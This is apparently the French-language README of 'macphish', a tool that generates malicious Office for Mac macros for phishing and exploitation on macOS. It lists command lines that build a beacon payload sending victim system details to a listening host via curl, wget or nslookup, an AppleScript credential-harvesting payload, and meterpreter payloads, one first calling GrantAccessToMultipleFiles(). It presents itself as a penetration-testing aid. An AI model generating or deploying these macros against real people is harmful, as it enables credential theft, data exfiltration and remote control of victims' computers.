
Génère des macros Office pour Mac malveillantes avec des charges utiles de balise, de récolte d'identifiants et de meterpreter pour les tests de phishing et d'exploitation sur macOS.
Générateur de charges utiles de macros pour Office Mac

Il y a 4 vecteurs d'attaque disponibles :
Pour la méthode 'creds', macphish peut générer le script Applescript directement, au cas où vous auriez besoin de l'exécuter depuis un shell.
Lors de l'exécution, cette charge utile signalera notre hôte d'écoute et fournira des informations système de base sur la victime. La façon la plus simple de générer une charge utile beacon est :
$./macphish.py -lh <listening host>
Par défaut, il utilise curl mais d'autres utilitaires (wget, nslookup) peuvent être utilisés en modifiant le modèle de commande.
$./macphish.py -lh <listening host> -lp <listening port> -a creds
La façon la plus simple de générer une charge utile meterpreter est :
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter
Pour générer une charge utile meterpreter qui appelle d'abord GrantAccessToMultipleFiles() :
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant
Pour les attaques meterpreter, seules les charges utiles Python sont prises en charge pour le moment.